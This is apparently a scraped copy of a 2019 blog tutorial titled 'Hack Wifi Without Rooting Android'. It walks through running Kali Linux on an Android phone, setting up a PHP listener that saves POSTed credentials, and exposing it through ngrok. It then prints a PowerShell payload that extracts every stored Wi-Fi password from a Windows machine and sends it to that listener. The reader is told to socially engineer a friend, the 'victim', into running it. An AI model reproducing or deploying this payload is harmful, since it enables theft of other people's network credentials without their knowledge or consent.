0% found this document useful (0 votes)
2 views10 pages

Hack Wifi Without Rooting Android

The document provides a tutorial on using specific applications, UserLand and ConnectBot, to install Kali Linux on a Xiaomi Redmi Note 4 for ethical hacking purposes, specifically to gather WiFi passwords. It includes detailed instructions on commands to execute in the terminal for various hacking techniques and emphasizes the importance of ethical hacking. Additionally, it features a section on a cyber security researcher with extensive experience in the field.

Uploaded by

Joeri Verhaeghen
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
2 views10 pages

Hack Wifi Without Rooting Android

The document provides a tutorial on using specific applications, UserLand and ConnectBot, to install Kali Linux on a Xiaomi Redmi Note 4 for ethical hacking purposes, specifically to gather WiFi passwords. It includes detailed instructions on commands to execute in the terminal for various hacking techniques and emphasizes the importance of ethical hacking. Additionally, it features a section on a cyber security researcher with extensive experience in the field.

Uploaded by

Joeri Verhaeghen
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

LATEST VIDEOS

ON HACKER MOBILE
HOW
For testing we will use Xiaomi Redmi Note 4. DATA
You have install BREACH
UserLand – VICTIMS
https://play.google.com/store/apps/details? ARE
id=tech.ula&hl=en_IN BEING
ConnectBot – HACKED
https://play.google.com/store/apps/details? AGAIN?
id=org.connectbot&hl=en_IN NEW
These applications will be used to gather Wifi ATTACK
Password. VECTOR
As per the ethical hacking researcher of
International Institute of Cyber Security, Userland
MCDONALD’S
will allow us to install different Linux distros on
mobile. So here we will install Kali Linux & connect MOBILE APP
it will ConnectBot. WAS
Click on Kali Linux enter HACKED; IT
password iicybersecurity@12345. You can write ALLOWED
any password. FREE
BURGERS
AND FRIES
VIEW ALL

POPULAR POSTS:

How to fake
your phone
number:
Make it look like…

How to
exploit new
Facebook
feature to access…

Type su && sudo apt-get update && sudo apt- How to Hack
get install net-tools Wi-Fi:
Type sudo apt-get install unzip && apt-mark Cracking
WPA2-PSK
build apache*
Passwords Using…

How to
intercept
mobile
communications
(calls and…
FireEye
confirms that
APT41
Group hacked
TeamViewer;…

Hack
Whatsapp
account of
your friend

CREATE
YOUR
OWN
WORDLIST
WITH CRUNCH

List of all
Then type sudo apt-get install php && sudo apt- Open FTP
get install screen Servers in
the World

Crack
Windows
password
with john the ripper

How to scan
whole
Internet 3.7
billion IP
addresses…

Fake any
website in
seconds
Facebook,
Snapchat,
Instagram :-

Do Hacking
with Simple
Python
Script

Hack
Windows,
Android,
Mac using
TheFatRat (Step
by…

How to
Type screen then again type screen exploit
SUDO via
Linux Privilege
Escalation
Hack any
website with
All in One
Tool

Create your
own BotNet
(Step By
Step tutorial)

Find
Webcams,
Databases,
Boats in the sea
using Shodan

How to
Connect
Android to
PC/Mac Without
WiFi

Bypass
antivirus
detection
With Phantom
Payloads

Fake text
message
attack. How
Prank or hack
your…

Generate
Type mkdir phpServer && type cd phpServer
Android App
Type nano index.php and this below code. in 2 mins and
hack any android
<html> mobile
<title> PHP Server </title>
<body> How to
<h1> It works!</h1> Check if
your Mobile
<?php
phone is hacked or
$file = date("y-h-m") . ".credz" not?
;
file_put_contents ($file , file_ TOP 6
get_contents("php://input")); Hacking
?> mobile Apps
</body> – must have
</html>
List of credit
cards,
proxies on
Deep Web
HIJACKING
WHATSAPP
ACCOUNTS
USING
WHATSAPP WEB

VULNERABILITIES

HACK
NETWORKS
USING CISCO
SD-WAN
THROUGH SQL
INJECTION
VULNERABILITY

DELTA
ELECTRONICS
AUTOMATION
DEVICES ALLOW
REMOTE CODE
EXECUTION;
MANUFACTURING
Type php -S 0.0.0.0:80 & INDUSTRY
Type ps -ef to check whether php is running or not. UNDER RISK

VULNERABILITY
IN
TRUEVECTOR
MODULE OF
CHECK
POINT’S
ZONEALARM
FIREWALL
ALLOWS
NETWORK
INTERNAL
ATTACKS
VIEW ALL

TUTORIALS
MEET SWISS
ARMY KNIFE
OF
PENETRATION
TESTING

NEW
PENETRATION
TESTING
FRAMEWORK
FOR
HACKERS

REDRABBIT
FOR
#REDTEAM
TO
CONDUCT
ETHICAL
HACKING

RUN PROGRAM
WITHOUT
ADMINISTRATOR
PRIVILEGES IN
Go WINDOWS
to https://dashboard.ngrok.com/signupcreate a
new account. After then login through your account. HOW TO USE
Go to Auth & copy the auth token. FACEBOOK
FOR OPEN
SOURCE
INVESTIGATION
(OSINT)

GET XSS
BUG
Type sudo apt-get install wget && BOUNTY
type wgethttps://bin.equinox.io/a/nmkK3DkqZEB/ngrok- WITH
2.2.8-linux-arm64.zip XSSFINDER
Now type unzip ngrok-2.2.8-linux-arm64.zip,
this will extract ngrok file in the same directory.
SEE HOW TO
SEARCH
USERNAME,
PASSWORDS,
CONFIGURATION
FILES, EMAILS,
OPEN
CAMERAS ON
GOOGLE

NEW LINUX FOR


CYBER
FORENSICS
AND
INVESTIGATORS
– CSI LINUX

SCAN
WHOLE
INTERNET
DOMAINS,
WITH
SPEED
OF
3,50,000
DOMAINS
PER
SECOND

ATTACK
Type ./ngrok authtoken <Your authtoken> ANY IP
ADDRESS,
WITH DDOS
BOTNET
SIMULATOR
VIEW ALL

MALWARE
Type screen
Then type ./ngrok http 80
Now to run this ngrok in background press key COVID-19
TRACKING
combination of Ctrl+a+n, this will move the ngrok
APP INSTALLS
command in background and return to the shell
RANSOMWARE
prompt. ON YOUR
According of the ethical hacking researcher of SMARTPHONE;
International Institute of Cyber Security this key BE CAREFUL
combination can change on the mobile model.
NEW
MALWARE
PROMISES
NUDE
PHOTOS OF
YOUR
GIRLFRIEND
OR
FRIEND’S
GIRLFRIEND

THESE
MEDICAL
DEVICES
COULD BE
EASILY
ENCRYPTED
WITH
WANNACRY
RANSOMWARE

EASILY
REMOVE
XHELPER
MALWARE
FROM
YOUR
ANDROID
DEVICE

NEW
RANSOMWARE
DEMANDS
PHOTOS OF
TITS &
PRIVATE
PARTS TO
Save the below code in .bat extension. For that you UNLOCK YOUR
can use WPS office application for saving the bat DATA
file. Download the WPS officeapplication
:https://play.google.com/store/apps/details?
id=cn.wps.moffice_eng&hl=en
Open application Click on + & then click on
Document. Paste the below code in WPS office
document editor. Save the file in payload.txt
Open file manager. rename file
to payload.txtto payload.bat

Add-Type -AssemblyName System.We


b;

$ngrokServer = "https://SUBDOMAIN.
ngrok.io/index.php";

foreach ($path in [System.IO.Direc


tory]::EnumerateFiles("C:\ProgramD
ata\Microsoft\Wlansvc\Profile
s","*.xml","AllDirectories")) {

try {
$oXml = New-Object System.XML.
XMLDocument;
$oXml.Load($path);
$ssid = $oXml.WLANProfile.SSID
Config.SSID.Name;
$netinfo = netsh.exe wlan show
profiles name="$ssid" key=clear;
$pass = (($netinfo | Select-St
ring -Pattern "Key Content") -spli
t ":")[1].Trim();
$sendData += "SSID: " + ($ssi
d) + "`n" + "PASSWORD: " + ($pass)
+ "`n`n";
} catch {}

Invoke-WebRequest -Uri $ngrokServe


r -Method 'POST' -Body $sendDat
a;

Now you make any social engineering trick to send


this payload to your friend. Once your friend open
the payload in Windows computer (VICTIM
machine). Above code is powershell code which
when run in powershell will extract all password in
VICTIM system.
As commented by digital forensics expert
of International Institute of Cyber Security,
came code is used in some malware with
powershell to get all passwords of the VICTIM
system
You will get all the stored Wifi passwords to your
android device.

Above you can see all stored passwords of Wifi


in /home/iicybersecurity/phpServer/directory.
For more information on others ways to hack wifi
passwords please follow this youtube link.
REDRABBIT FOR #REDTEAM RUN PROGRAM W
TO CONDUCT ETHICAL ADMINISTRATOR PR
HACKING IN WINDOW

Jim Gill
Cyber Security Researcher.
Information security specialist,
currently working as risk
infrastructure specialist &
investigator. He is a cyber-security
researcher with over 25 years of
experience. He has served with the
Intelligence Agency as a Senior Intelligence Officer. He has
also worked with Google and Citrix in development of cyber
security solutions. He has aided the government and many
federal agencies in thwarting many cyber crimes. He has
been writing for us in his free time since last 5 years.

ON: SEPTEMBER 9, 2019 IN: TUTORIALS, WEB


SCANNERS TAGGED: HACK WIFI, HACK WIFI ON NON
ROOTED DEVICE, WPA2 PASSWORDS

You might also like